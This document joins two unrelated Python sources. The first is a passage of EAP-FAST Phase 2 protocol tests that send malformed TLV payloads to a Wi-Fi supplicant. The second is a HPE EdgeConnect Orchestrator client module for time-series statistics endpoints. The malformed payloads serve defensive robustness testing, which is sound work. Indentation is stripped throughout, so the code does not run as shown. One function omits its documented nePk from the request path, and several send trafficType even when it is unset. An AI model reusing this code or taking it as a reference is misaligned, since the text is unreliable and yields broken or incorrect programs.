def run_eap_fast_phase2(dev, test_payload, test_failure=True):
global eap_fast_proto_ctx
eap_fast_proto_ctx = None
def ssl_info_callback(conn, where, ret):
logger.debug("SSL: info where=%d ret=%d" % (where, ret))
def log_conn_state(conn):
try:
state = conn.state_string()
except AttributeError:
state = conn.get_state_string()
if state:
logger.info("State: " + state)
def process_clienthello(ctx, payload):
logger.info("Process ClientHello")
ctx['sslctx'] = OpenSSL.SSL.Context(OpenSSL.SSL.TLSv1_METHOD)
ctx['sslctx'].set_info_callback(ssl_info_callback)
ctx['sslctx'].load_tmp_dh("auth_serv/dh.conf")
ctx['sslctx'].set_cipher_list("ADH-AES128-SHA")
ctx['conn'] = OpenSSL.SSL.Connection(ctx['sslctx'], None)
ctx['conn'].set_accept_state()
log_conn_state(ctx['conn'])
ctx['conn'].bio_write(payload)
try:
ctx['conn'].do_handshake()
except OpenSSL.SSL.WantReadError:
pass
log_conn_state(ctx['conn'])
data = ctx['conn'].bio_read(4096)
log_conn_state(ctx['conn'])
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + len(data),
EAP_TYPE_FAST, 0x01) + data
def process_clientkeyexchange(ctx, payload, appl_data):
logger.info("Process ClientKeyExchange")
log_conn_state(ctx['conn'])
ctx['conn'].bio_write(payload)
try:
ctx['conn'].do_handshake()
except OpenSSL.SSL.WantReadError:
pass
ctx['conn'].send(appl_data)
log_conn_state(ctx['conn'])
data = ctx['conn'].bio_read(4096)
log_conn_state(ctx['conn'])
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + len(data),
EAP_TYPE_FAST, 0x01) + data
def eap_handler(ctx, req):
logger.info("eap_handler - RX " + req.encode("hex"))
if 'num' not in ctx:
ctx['num'] = 0
ctx['num'] = ctx['num'] + 1
if 'id' not in ctx:
ctx['id'] = 1
ctx['id'] = (ctx['id'] + 1) % 256
idx = 0
global eap_fast_proto_ctx
eap_fast_proto_ctx = ctx
ctx['test_done'] = False
logger.debug("ctx['num']=%d" % ctx['num'])
idx += 1
if ctx['num'] == idx:
return eap_fast_start(ctx)
idx += 1
if ctx['num'] == idx:
return process_clienthello(ctx, req[6:])
idx += 1
if ctx['num'] == idx:
if not test_failure:
ctx['test_done'] = True
return process_clientkeyexchange(ctx, req[6:], test_payload)
idx += 1
if ctx['num'] == idx:
ctx['test_done'] = True
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
logger.info("Past last test case")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
srv = start_radius_server(eap_handler)
try:
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="FAST", anonymous_identity="FAST",
identity="user", password="password",
ca_cert="auth_serv/ca.pem", phase2="auth=MSCHAPV2",
phase1="fast_provisioning=1",
pac_file="blob://fast_pac_proto",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-METHOD"], timeout=5)
if ev is None:
raise Exception("Could not start EAP-FAST")
dev[0].dump_monitor()
ok = False
for i in range(100):
if eap_fast_proto_ctx:
if eap_fast_proto_ctx['test_done']:
ok = True
break
time.sleep(0.05)
time.sleep(0.1)
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
if not ok:
raise Exception("EAP-FAST TLS exchange did not complete")
for i in range(3):
dev[i].dump_monitor()
finally:
stop_radius_server(srv)
def test_eap_fast_proto_phase2(dev, apdev):
"""EAP-FAST Phase 2 protocol testing"""
if not openssl_imported:
raise HwsimSkip("OpenSSL python method not available")
check_eap_capa(dev[0], "FAST")
hapd = start_ap(apdev[0])
tests = [ ("Too short Phase 2 TLV frame (len=3)",
"ABC",
False),
("EAP-FAST: TLV overflow",
struct.pack(">HHB", 0, 2, 0xff),
False),
("EAP-FAST: Unknown TLV (optional and mandatory)",
struct.pack(">HHB", 0, 1, 0xff) +
struct.pack(">HHB", EAP_TLV_TYPE_MANDATORY, 1, 0xff),
True),
("EAP-FAST: More than one EAP-Payload TLV in the message",
struct.pack(">HHBHHB",
EAP_TLV_EAP_PAYLOAD_TLV, 1, 0xff,
EAP_TLV_EAP_PAYLOAD_TLV, 1, 0xff),
True),
("EAP-FAST: Unknown Result 255 and More than one Result TLV in the message",
struct.pack(">HHHHHH",
EAP_TLV_RESULT_TLV, 2, 0xff,
EAP_TLV_RESULT_TLV, 2, 0xff),
True),
("EAP-FAST: Too short Result TLV",
struct.pack(">HHB", EAP_TLV_RESULT_TLV, 1, 0xff),
True),
("EAP-FAST: Unknown Intermediate Result 255 and More than one Intermediate-Result TLV in the message",
struct.pack(">HHHHHH",
EAP_TLV_INTERMEDIATE_RESULT_TLV, 2, 0xff,
EAP_TLV_INTERMEDIATE_RESULT_TLV, 2, 0xff),
True),
("EAP-FAST: Too short Intermediate-Result TLV",
struct.pack(">HHB", EAP_TLV_INTERMEDIATE_RESULT_TLV, 1, 0xff),
True),
("EAP-FAST: More than one Crypto-Binding TLV in the message",
struct.pack(">HH", EAP_TLV_CRYPTO_BINDING_TLV, 60) + 60*'A' +
struct.pack(">HH", EAP_TLV_CRYPTO_BINDING_TLV, 60) + 60*'A',
True),
("EAP-FAST: Too short Crypto-Binding TLV",
struct.pack(">HHB", EAP_TLV_CRYPTO_BINDING_TLV, 1, 0xff),
True),
("EAP-FAST: More than one Request-Action TLV in the message",
struct.pack(">HHBBHHBB",
EAP_TLV_REQUEST_ACTION_TLV, 2, 0xff, 0xff,
EAP_TLV_REQUEST_ACTION_TLV, 2, 0xff, 0xff),
True),
("EAP-FAST: Too short Request-Action TLV",
struct.pack(">HHB", EAP_TLV_REQUEST_ACTION_TLV, 1, 0xff),
True),
("EAP-FAST: More than one PAC TLV in the message",
struct.pack(">HHBHHB",
EAP_TLV_PAC_TLV, 1, 0xff,
EAP_TLV_PAC_TLV, 1, 0xff),
True),
("EAP-FAST: Too short EAP Payload TLV (Len=3)",
struct.pack(">HH3B",
EAP_TLV_EAP_PAYLOAD_TLV, 3, 0, 0, 0),
False),
("EAP-FAST: Too short Phase 2 request (Len=0)",
struct.pack(">HHBBH",
EAP_TLV_EAP_PAYLOAD_TLV, 4,
EAP_CODE_REQUEST, 0, 0),
False),
("EAP-FAST: EAP packet overflow in EAP Payload TLV",
struct.pack(">HHBBH",
EAP_TLV_EAP_PAYLOAD_TLV, 4,
EAP_CODE_REQUEST, 0, 4 + 1),
False),
("EAP-FAST: Unexpected code=0 in Phase 2 EAP header",
struct.pack(">HHBBH",
EAP_TLV_EAP_PAYLOAD_TLV, 4,
0, 0, 0),
False),
("EAP-FAST: PAC TLV without Result TLV acknowledging success",
struct.pack(">HHB", EAP_TLV_PAC_TLV, 1, 0xff),
True),
("EAP-FAST: PAC TLV does not include all the required fields",
struct.pack(">HHH", EAP_TLV_RESULT_TLV, 2,
EAP_TLV_RESULT_SUCCESS) +
struct.pack(">HHB", EAP_TLV_PAC_TLV, 1, 0xff),
True),
("EAP-FAST: Invalid PAC-Key length 0, Ignored unknown PAC type 0, and PAC TLV overrun (type=0 len=2 left=1)",
struct.pack(">HHH", EAP_TLV_RESULT_TLV, 2,
EAP_TLV_RESULT_SUCCESS) +
struct.pack(">HHHHHHHHB", EAP_TLV_PAC_TLV, 4 + 4 + 5,
PAC_TYPE_PAC_KEY, 0, 0, 0, 0, 2, 0),
True),
("EAP-FAST: PAC-Info does not include all the required fields",
struct.pack(">HHH", EAP_TLV_RESULT_TLV, 2,
EAP_TLV_RESULT_SUCCESS) +
struct.pack(">HHHHHHHH", EAP_TLV_PAC_TLV, 4 + 4 + 4 + 32,
PAC_TYPE_PAC_OPAQUE, 0,
PAC_TYPE_PAC_INFO, 0,
PAC_TYPE_PAC_KEY, 32) + 32*'A',
True),
("EAP-FAST: Invalid CRED_LIFETIME length, Ignored unknown PAC-Info type 0, and Invalid PAC-Type length 1",
struct.pack(">HHH", EAP_TLV_RESULT_TLV, 2,
EAP_TLV_RESULT_SUCCESS) +
struct.pack(">HHHHHHHHHHHHBHH", EAP_TLV_PAC_TLV, 4 + 4 + 13 + 4 + 32,
PAC_TYPE_PAC_OPAQUE, 0,
PAC_TYPE_PAC_INFO, 13, PAC_TYPE_CRED_LIFETIME, 0,
0, 0, PAC_TYPE_PAC_TYPE, 1, 0,
PAC_TYPE_PAC_KEY, 32) + 32*'A',
True),
("EAP-FAST: Unsupported PAC-Type 0",
struct.pack(">HHH", EAP_TLV_RESULT_TLV, 2,
EAP_TLV_RESULT_SUCCESS) +
struct.pack(">HHHHHHHHHHH", EAP_TLV_PAC_TLV, 4 + 4 + 6 + 4 + 32,
PAC_TYPE_PAC_OPAQUE, 0,
PAC_TYPE_PAC_INFO, 6, PAC_TYPE_PAC_TYPE, 2, 0,
PAC_TYPE_PAC_KEY, 32) + 32*'A',
True),
("EAP-FAST: PAC-Info overrun (type=0 len=2 left=1)",
struct.pack(">HHH", EAP_TLV_RESULT_TLV, 2,
EAP_TLV_RESULT_SUCCESS) +
struct.pack(">HHHHHHHHBHH", EAP_TLV_PAC_TLV, 4 + 4 + 5 + 4 + 32,
PAC_TYPE_PAC_OPAQUE, 0,
PAC_TYPE_PAC_INFO, 5, 0, 2, 1,
PAC_TYPE_PAC_KEY, 32) + 32*'A',
True),
("EAP-FAST: Valid PAC",
struct.pack(">HHH", EAP_TLV_RESULT_TLV, 2,
EAP_TLV_RESULT_SUCCESS) +
struct.pack(">HHHHHHHHBHHBHH", EAP_TLV_PAC_TLV,
4 + 4 + 10 + 4 + 32,
PAC_TYPE_PAC_OPAQUE, 0,
PAC_TYPE_PAC_INFO, 10, PAC_TYPE_A_ID, 1, 0x41,
PAC_TYPE_A_ID_INFO, 1, 0x42,
PAC_TYPE_PAC_KEY, 32) + 32*'A',
True),
("EAP-FAST: Invalid version/subtype in Crypto-Binding TLV",
struct.pack(">HH", EAP_TLV_CRYPTO_BINDING_TLV, 60) + 60*'A',
True) ]
for title, payload, failure in tests:
logger.info("Phase 2 test: " + title)
run_eap_fast_phase2(dev, payload, failure)
def test_eap_fast_tlv_nak_oom(dev, apdev):
"""EAP-FAST Phase 2 TLV NAK OOM"""
if not openssl_imported:
raise HwsimSkip("OpenSSL python method not available")
check_eap_capa(dev[0], "FAST")
hapd = start_ap(apdev[0])
with alloc_fail(dev[0], 1, "eap_fast_tlv_nak"):
run_eap_fast_phase2(dev, struct.pack(">HHB", EAP_TLV_TYPE_MANDATORY,
1, 0xff), False)
# --- pyedgeconnect/orch/_timeseries_stats.py (repo: SPOpenSource/edgeconnect-python, license: MIT) ---
# MIT License
# (C) Copyright 2021 Hewlett Packard Enterprise Development LP.
#
# timeseriesStats : ECOS time series statistics
def get_timeseries_stats_appliance_process_state(
self,
ne_pk: str,
) -> list:
"""Get time series appliance process state statistics
.. list-table::
:header-rows: 1
* - Swagger Section
- Method
- Endpoint
* - timeseriesStats
- GET
- /stats/timeseries/applianceProcessState/{nePk}
:param ne_pk: Network Primary Key (nePk) of appliance, e.g. ``3.NE``
:type ne_pk: str
:return: Returns list of dictionaries
:rtype: list
"""
return self._get(
"/stats/timeseries/applianceProcessState/{}".format(ne_pk)
)
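# Example (a sketch, assuming an authenticated Orchestrator session bound to
# this module's class as ``orch``):
#
# process_state = orch.get_timeseries_stats_appliance_process_state("3.NE")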
def get_timeseries_stats_orchestrator_memory(
self,
start_time: int,
end_time: int,
key: str = None,
) -> list:
"""Get time series memory statistics for Orchestrator
.. list-table::
:header-rows: 1
* - Swagger Section
- Method
- Endpoint
* - timeseriesStats
- GET
- /stats/timeseries/metrics
:param start_time: Long(Signed 64 bits) value of seconds since EPOCH
time indicating the starting time boundary of data time range
:type start_time: int
:param end_time: Long(Signed 64 bits) value of seconds since EPOCH
time indicating the ending time boundary of data time range
:type end_time: int
:param key: Swagger docs "For now it should be empty",
defaults to None
:type key: str, optional
:return: Returns list of dictionaries, all memory values are in KB
:rtype: list
"""
path = "/stats/timeseries/metrics?startTime={}&endTime={}".format(
start_time, end_time
)
if key is not None:
path = path + "&key={}".format(key)
return self._get(path)
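# Example (a sketch, assuming an authenticated session ``orch``): fetch the
# last 24 hours of Orchestrator memory statistics using EPOCH seconds.
#
# import time
# end_time = int(time.time())
# start_time = end_time - 24 * 60 * 60
# memory_stats = orch.get_timeseries_stats_orchestrator_memory(start_time,
#                                                              end_time)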
def get_timeseries_stats_tunnel_single_appliance(
self,
ne_pk: str,
start_time: int,
end_time: int,
tunnel_name: str,
granularity: str,
limit: int = None,
data_format: str = None,
ip: bool = None,
latest: int = None,
) -> dict:
"""Get time series tunnel statistics for single appliance
.. list-table::
:header-rows: 1
* - Swagger Section
- Method
- Endpoint
* - timeseriesStats
- GET
- /stats/timeseries/tunnel/{nePk}
This operation returns a JSON object containing COLUMN_DEF and DATA.
COLUMN_DEF is an array containing the names indicating what
corresponding number in data array means. Data objects of each
appliance is an array of data arrays, each data array contains the
stats for a particular timestamp. Each number is data array
corresponds to a name in COLUMN_DEF.
DATA object contains only values not keys.
:param ne_pk: Network Primary Key (nePk) of appliance, e.g. ``3.NE``
:type ne_pk: str
:param start_time: Long(Signed 64 bits) value of seconds since EPOCH
time indicating the starting time boundary of data time range
:type start_time: int
:param end_time: Long(Signed 64 bits) value of seconds since EPOCH
time indicating the ending time boundary of data time range
:type end_time: int
:param tunnel_name: Filter for data which belongs to specified
tunnel name
:type tunnel_name: str
:param granularity: Data granularity filtering whether data is
minutely data, hourly data or daily data. Accepted values are
``minute``, ``hour``, and ``day``
:type granularity: str
:param limit: Limit the number of stats entity retrieved. When
unspecified, defaults to 10,000 which is also the maximum
allowed value, defaults to None
:type limit: int, optional
:param data_format: The only format other than JSON currently
supported is CSV, accepted value is ``csv``, defaults to None
:type data_format: str, optional
:param ip: ``True`` to use IP address as key to sort results and
``False`` or ``None`` to sort by appliance ID, defaults to None
:type ip: bool, optional
:param latest: Latest time window to retrieve stats from. Unit is
minute. e.g. ``10``. Default is to use ``start_time`` and
``end_time`` but if ``latest`` is not ``None`` then it takes
priority, defaults to None
:type latest: int, optional
:return: Returns nested dictionary
:rtype: dict
"""
path = (
"/stats/timeseries/tunnel/"
+ "{}?startTime={}&endTime={}&granularity={}&tunnel_name={}".format(
ne_pk, start_time, end_time, granularity, tunnel_name
)
)
if limit is not None:
path = path + "&limit={}".format(limit)
if data_format is not None:
path = path + "&format={}".format(data_format)
if ip is not None:
path = path + "&ip={}".format(ip)
if latest is not None:
path = path + "&latest={}".format(latest)
return self._get(path)
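# Example (a sketch, assuming an authenticated session ``orch``; the exact
# COLUMN_DEF/DATA key names in the response may vary by Orchestrator
# version): pair each data row back up with its column names.
#
# stats = orch.get_timeseries_stats_tunnel_single_appliance(
#     "3.NE", start_time, end_time, "tunnel_1", "minute")
# for row in stats["data"]:
#     sample = dict(zip(stats["columnDef"], row))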
def get_timeseries_stats_appliances(
self,
start_time: int,
end_time: int,
granularity: str,
group_pk: str = None,
traffic_type: str = None,
limit: int = None,
data_format: str = None,
ip: bool = None,
latest: int = None,
) -> dict:
"""Get time series appliance statistics
.. list-table::
:header-rows: 1
* - Swagger Section
- Method
- Endpoint
* - timeseriesStats
- GET
- /stats/timeseries/appliance
This operation returns a JSON object containing COLUMN_DEF and DATA.
COLUMN_DEF is an array containing the names indicating what
corresponding number in data array means. Data objects of each
appliance is an array of data arrays, each data array contains the
stats for a particular timestamp. Each number is data array
corresponds to a name in COLUMN_DEF.
DATA object contains only values not keys.
:param start_time: Long(Signed 64 bits) value of seconds since EPOCH
time indicating the starting time boundary of data time range
:type start_time: int
:param end_time: Long(Signed 64 bits) value of seconds since EPOCH
time indicating the ending time boundary of data time range
:type end_time: int
:param granularity: Data granularity filtering whether data is
minutely data, hourly data or daily data. Accepted values are
``minute``, ``hour``, and ``day``
:type granularity: str
:param group_pk: Filter by appliance group identifier,
e.g. ``0.Network`` is root group, ``1.Network`` is internal use,
``2.Network`` is auto-discovered groups, ``3.Network`` and
beyond is user-defined groups, defaults to None
:type group_pk: str, optional
:param traffic_type: Filter for data for given traffic type,
accepted values are ``optimized_traffic``,
``pass_through_shaped``, ``pass_through_unshaped``, and
``all_traffic``, defaults to None
:type traffic_type: str, optional
:param limit: Limit the number of stats entity retrieved. When
unspecified, defaults to 10,000 which is also the maximum
allowed value, defaults to None
:type limit: int, optional
:param data_format: The only format other than JSON currently
supported is CSV, accepted value is ``csv``, defaults to None
:type data_format: str, optional
:param ip: ``True`` to use IP address as key to sort results and
``False`` or ``None`` to sort by appliance ID,
defaults to None
:type ip: bool, optional
:param latest: Latest time window to retrieve stats from. Unit is
minute. e.g. ``10``. Default is to use ``start_time`` and
``end_time`` but if ``latest`` is not ``None`` then it takes
priority, defaults to None
:type latest: int, optional
:return: Returns nested dictionary
:rtype: dict
"""
path = (
"/stats/timeseries/appliance?startTime="
+ "{}&endTime={}&granularity={}".format(
start_time, end_time, granularity
)
)
if group_pk is not None:
path = path + "&groupPk={}".format(group_pk)
path = path + "&trafficType={}".format(traffic_type)
if limit is not None:
path = path + "&limit={}".format(limit)
if data_format is not None:
path = path + "&format={}".format(data_format)
if ip is not None:
path = path + "&ip={}".format(ip)
if latest is not None:
path = path + "&latest={}".format(latest)
return self._get(path)
def get_timeseries_stats_appliances_ne_pk_list(
self,
ne_pk_list: list[str],
start_time: int,
end_time: int,
granularity: str,
traffic_type: str = None,
limit: int = None,
data_format: str = None,
ip: bool = None,
latest: int = None,
) -> dict:
"""Get time series appliance statistics for list of appliances
.. list-table::
:header-rows: 1
* - Swagger Section
- Method
- Endpoint
* - timeseriesStats
- POST
- /stats/timeseries/appliance
This operation returns a JSON object containing COLUMN_DEF and DATA.
COLUMN_DEF is an array containing the names indicating what
corresponding number in data array means. Data objects of each
appliance is an array of data arrays, each data array contains the
stats for a particular timestamp. Each number is data array
corresponds to a name in COLUMN_DEF.
DATA object contains only values not keys.
:param ne_pk_list: List of one or more appliance Network Primary
Keys (nePk), e.g. ``["3.NE","5.NE"]``
:type ne_pk_list: list[str]
:param start_time: Long(Signed 64 bits) value of seconds since EPOCH
time indicating the starting time boundary of data time range
:type start_time: int
:param end_time: Long(Signed 64 bits) value of seconds since EPOCH
time indicating the ending time boundary of data time range
:type end_time: int
:param granularity: Data granularity filtering whether data is
minutely data, hourly data or daily data. Accepted values are
``minute``, ``hour``, and ``day``
:type granularity: str
:param traffic_type: Filter for data for given traffic type,
accepted values are "optimized_traffic" "pass_through_shaped"
"pass_through_unshaped" "all_traffic", defaults to None
:type traffic_type: str, optional
:param limit: Limit the number of stats entity retrieved. When
unspecified, defaults to 10,000 which is also the maximum
allowed value, defaults to None
:type limit: int, optional
:param data_format: The only format other than JSON currently
supported is CSV, accepted value is ``csv``, defaults to None
:type data_format: str, optional
:param ip: ``True`` to use IP address as key to sort results and
``False`` or ``None`` to sort by appliance ID, defaults to None
:type ip: bool, optional
:param latest: Latest time window to retrieve stats from. Unit is
minute. e.g. ``10``. Default is to use ``start_time`` and
``end_time`` but if ``latest`` is not ``None`` then it takes
priority, defaults to None
:type latest: int, optional
:return: Returns nested dictionary
:rtype: dict
"""
path = (
"/stats/timeseries/appliance?startTime="
+ "{}&endTime={}&granularity={}".format(
start_time, end_time, granularity
)
)
path = path + "&trafficType={}".format(traffic_type)
if limit is not None:
path = path + "&limit={}".format(limit)
if data_format is not None:
path = path + "&format={}".format(data_format)
if ip is not None:
path = path + "&ip={}".format(ip)
if latest is not None:
path = path + "&latest={}".format(latest)
data = {"ids": ne_pk_list}
return self._post(path, data=data)
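# The POST variants in this module differ from their GET counterparts only
# in passing the target appliances in the request body as ``{"ids": [...]}``
# instead of addressing a single nePk in the URL.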
def get_timeseries_stats_appliances_single_appliance(
self,
ne_pk: str,
start_time: int,
end_time: int,
granularity: str,
traffic_type: str = None,
limit: int = None,
data_format: str = None,
ip: bool = None,
latest: int = None,
) -> dict:
"""
Get time series appliance statistics for single appliance
.. list-table::
:header-rows: 1
* - Swagger Section
- Method
- Endpoint
* - timeseriesStats
- GET
- /stats/timeseries/appliance/{nePk}
This operation returns a JSON object containing COLUMN_DEF and DATA.
COLUMN_DEF is an array containing the names indicating what
corresponding number in data array means. Data objects of each
appliance is an array of data arrays, each data array contains the
stats for a particular timestamp. Each number is data array
corresponds to a name in COLUMN_DEF.
DATA object contains only values not keys.
:param ne_pk: Network Primary Key (nePk) of appliance, e.g. ``3.NE``
:type ne_pk: str
:param start_time: Long(Signed 64 bits) value of seconds since EPOCH
time indicating the starting time boundary of data time range
:type start_time: int
:param end_time: Long(Signed 64 bits) value of seconds since EPOCH
time indicating the ending time boundary of data time range
:type end_time: int
:param granularity: Data granularity filtering whether data is
minutely data, hourly data or daily data. Accepted values are
``minute``, ``hour``, and ``day``
:type granularity: str
:param traffic_type: Filter for data for given traffic type,
accepted values are ``optimized_traffic``,
``pass_through_shaped``, ``pass_through_unshaped``, and
``all_traffic``, defaults to None
:type traffic_type: str, optional
:param limit: Limit the number of stats entity retrieved. When
unspecified, defaults to 10,000 which is also the maximum
allowed value, defaults to None
:type limit: int, optional
:param data_format: The only format other than JSON currently
supported is CSV, accepted value is ``csv``, defaults to None
:type data_format: str, optional
:param ip: ``True`` to use IP address as key to sort results and
``False`` or ``None`` to sort by appliance ID, defaults to None
:type ip: bool, optional
:param latest: Latest time window to retrieve stats from. Unit is
minute. e.g. ``10``. Default is to use ``start_time`` and
``end_time`` but if ``latest`` is not ``None`` then it takes
priority, defaults to None
:type latest: int, optional
:return: Returns nested dictionary
:rtype: dict
"""
path = (
"/stats/timeseries/appliance/"
+ "{}?startTime={}&endTime={}&granularity={}".format(
ne_pk, start_time, end_time, granularity
)
)
path = path + "&trafficType={}".format(traffic_type)
if limit is not None:
path = path + "&limit={}".format(limit)
if data_format is not None:
path = path + "&format={}".format(data_format)
if ip is not None:
path = path + "&ip={}".format(ip)
if latest is not None:
path = path + "&latest={}".format(latest)
return self._get(path)
def get_timeseries_stats_traffic_class(
self,
start_time: int,
end_time: int,
granularity: str,
traffic_type: str,
traffic_class: int,
group_pk: str = None,
limit: int = None,
data_format: str = None,
ip: bool = None,
latest: int = None,
) -> dict:
"""Get time series traffic class statistics
.. list-table::
:header-rows: 1
* - Swagger Section
- Method
- Endpoint
* - timeseriesStats
- GET
- /stats/timeseries/trafficClass
This operation returns a JSON object containing COLUMN_DEF and DATA.
COLUMN_DEF is an array containing the names indicating what
corresponding number in data array means. Data objects of each
appliance is an array of data arrays, each data array contains the
stats for a particular timestamp. Each number is data array
corresponds to a name in COLUMN_DEF.
DATA object contains only values not keys.
:param start_time: Long(Signed 64 bits) value of seconds since EPOCH
time indicating the starting time boundary of data time range
:type start_time: int
:param end_time: Long(Signed 64 bits) value of seconds since EPOCH
time indicating the ending time boundary of data time range
:type end_time: int
:param granularity: Data granularity filtering whether data is
minutely data, hourly data or daily data. Accepted values are
``minute``, ``hour``, and ``day``
:type granularity: str
:param traffic_type: Filter for data for given traffic type,
accepted values are ``optimized_traffic``,
``pass_through_shaped``, ``pass_through_unshaped``, and
``all_traffic``
:type traffic_type: str
:param traffic_class: Filter for data which belongs to particular
traffic class, accepted values between 1-10
:type traffic_class: int
:param group_pk: Filter by appliance group identifier,
e.g. ``0.Network`` is root group, ``1.Network`` is internal use,
``2.Network`` is auto-discovered groups, ``3.Network`` and
beyond is user-defined groups, defaults to None
:type group_pk: str, optional
:param limit: Limit the number of stats entity retrieved. When
unspecified, defaults to 10,000 which is also the maximum
allowed value, defaults to None
:type limit: int, optional
:param data_format: The only format other than JSON currently
supported is CSV, accepted value is ``csv``, defaults to None
:type data_format: str, optional
:param ip: ``True`` to use IP address as key to sort results and
``False`` or ``None`` to sort by appliance ID,
defaults to None
:type ip: bool, optional
:param latest: Latest time window to retrieve stats from. Unit is
minute. e.g. ``10``. Default is to use ``start_time`` and
``end_time`` but if ``latest`` is not ``None`` then it takes
priority, defaults to None
:type latest: int, optional
:return: Returns nested dictionary
:rtype: dict
"""
path = (
"/stats/timeseries/trafficClass?startTime="
+ "{}&endTime={}&granularity={}".format(
start_time, end_time, granularity
)
)
if group_pk is not None:
path = path + "&groupPk={}".format(group_pk)
path = path + "&trafficType={}".format(traffic_type)
path = path + "&trafficClass={}".format(traffic_class)
if limit is not None:
path = path + "&limit={}".format(limit)
if data_format is not None:
path = path + "&format={}".format(data_format)
if ip is not None:
path = path + "&ip={}".format(ip)
if latest is not None:
path = path + "&latest={}".format(latest)
return self._get(path)
def get_timeseries_stats_traffic_class_ne_pk_list(
self,
ne_pk_list: list[str],
start_time: int,
end_time: int,
granularity: str,
traffic_type: str,
traffic_class: int,
limit: int = None,
data_format: str = None,
ip: bool = None,
latest: int = None,
) -> dict:
"""Get time series traffic class statistics for list of appliances
.. list-table::
:header-rows: 1
* - Swagger Section
- Method
- Endpoint
* - timeseriesStats
- POST
- /stats/timeseries/trafficClass
This operation returns a JSON object containing COLUMN_DEF and DATA.
COLUMN_DEF is an array containing the names indicating what
corresponding number in data array means. Data objects of each
appliance is an array of data arrays, each data array contains the
stats for a particular timestamp. Each number is data array
corresponds to a name in COLUMN_DEF.
DATA object contains only values not keys.
:param ne_pk_list: List of one or more appliance Network Primary
Keys (nePk), e.g. ``["3.NE","5.NE"]``
:type ne_pk_list: list[str]
:param start_time: Long(Signed 64 bits) value of seconds since EPOCH
time indicating the starting time boundary of data time range
:type start_time: int
:param end_time: Long(Signed 64 bits) value of seconds since EPOCH
time indicating the ending time boundary of data time range
:type end_time: int
:param granularity: Data granularity filtering whether data is
minutely data, hourly data or daily data. Accepted values are
``minute``, ``hour``, and ``day``
:type granularity: str
:param traffic_type: Filter for data for given traffic type,
accepted values are ``optimized_traffic``,
``pass_through_shaped``, ``pass_through_unshaped``, and
``all_traffic``
:type traffic_type: str
:param traffic_class: Filter for data which belongs to particular
traffic class, accepted values between 1-10
:type traffic_class: int
:param limit: Limit the number of stats entity retrieved. When
unspecified, defaults to 10,000 which is also the maximum
allowed value, defaults to None
:type limit: int, optional
:param data_format: The only format other than JSON currently
supported is CSV, accepted value is ``csv``, defaults to None
:type data_format: str, optional
:param ip: ``True`` to use IP address as key to sort results and
``False`` or ``None`` to sort by appliance ID,
defaults to None
:type ip: bool, optional
:param latest: Latest time window to retrieve stats from. Unit is
minute. e.g. ``10``. Default is to use ``start_time`` and
``end_time`` but if ``latest`` is not ``None`` then it takes
priority, defaults to None
:type latest: int, optional
:return: Returns nested dictionary
:rtype: dict
"""
path = (
"/stats/timeseries/trafficClass?startTime="
+ "{}&endTime={}&granularity={}".format(
start_time, end_time, granularity
)
)
path = path + "&trafficType={}".format(traffic_type)
path = path + "&trafficClass={}".format(traffic_class)
if limit is not None:
path = path + "&limit={}".format(limit)
if data_format is not None:
path = path + "&format={}".format(data_format)
if ip is not None:
path = path + "&ip={}".format(ip)
if latest is not None:
path = path + "&latest={}".format(latest)
data = {"ids": ne_pk_list}
return self._post(path, data=data)
def get_timeseries_stats_traffic_class_single_appliance(
self,
ne_pk: str,
start_time: int,
end_time: int,
granularity: str,
traffic_type: str,
traffic_class: int,
limit: int = None,
data_format: str = None,
ip: bool = None,
latest: int = None,
) -> dict:
"""Get time series traffic class statistics for a single appliance
.. list-table::
:header-rows: 1
* - Swagger Section
- Method
- Endpoint
* - timeseriesStats
- GET
- /stats/timeseries/trafficClass/{nePk}
This operation returns a JSON object containing COLUMN_DEF and DATA.
COLUMN_DEF is an array containing the names indicating what
corresponding number in data array means. Data objects of each
appliance is an array of data arrays, each data array contains the
stats for a particular timestamp. Each number is data array
corresponds to a name in COLUMN_DEF.
DATA object contains only values not keys.
:param ne_pk: Network Primary Key (nePk) of appliance, e.g. ``3.NE``
:type ne_pk: str
:param start_time: Long(Signed 64 bits) value of seconds since EPOCH
time indicating the starting time boundary of data time range
:type start_time: int
:param end_time: Long(Signed 64 bits) value of seconds since EPOCH
time indicating the ending time boundary of data time range
:type end_time: int
:param granularity: Data granularity filtering whether data is
minutely data, hourly data or daily data. Accepted values are
``minute``, ``hour``, and ``day``
:type granularity: str
:param traffic_type: Filter for data for given traffic type,
accepted values are ``optimized_traffic``,
``pass_through_shaped``, ``pass_through_unshaped``, and
``all_traffic``
:type traffic_type: str
:param traffic_class: Filter for data which belongs to particular
traffic class, accepted values between 1-10
:type traffic_class: int
:param limit: Limit the number of stats entity retrieved. When
unspecified, defaults to 10,000 which is also the maximum
allowed value, defaults to None
:type limit: int, optional
:param data_format: The only format other than JSON currently
supported is CSV, accepted value is ``csv``, defaults to None
:type data_format: str, optional
:param ip: ``True`` to use IP address as key to sort results and
``False`` or ``None`` to sort by appliance ID,
defaults to None
:type ip: bool, optional
:param latest: Latest time window to retrieve stats from. Unit is
minute. e.g. ``10``. Default is to use ``start_time`` and
``end_time`` but if ``latest`` is not ``None`` then it takes
priority, defaults to None
:type latest: int, optional
:return: Returns nested dictionary
:rtype: dict
"""
path = (
"/stats/timeseries/trafficClass?startTime="
+ "{}&endTime={}&granularity={}".format(
start_time, end_time, granularity
)
)
path = path + "&trafficType={}".format(traffic_type)
path = path + "&trafficClass={}".format(traffic_class)
if limit is not None:
path = path + "&limit={}".format(limit)
if data_format is not None:
path = path + "&format={}".format(data_format)
if ip is not None:
path = path + "&ip={}".format(ip)
if latest is not None:
path = path + "&latest={}".format(latest)
return self._get(path)
def get_timeseries_stats_flow(
self,
start_time: int,
end_time: int,
granularity: str,
group_pk: str = None,
traffic_type: str = "all_traffic",
flow_type: str = "TCP_ACCELERATED",
limit: int = None,
data_format: str = None,
ip: bool = None,
latest: int = None,
) -> dict:
"""Get time series flow statistics
.. list-table::
:header-rows: 1
* - Swagger Section
- Method
- Endpoint
* - timeseriesStats
- GET
- /stats/timeseries/flow
This operation returns a JSON object containing COLUMN_DEF and DATA.
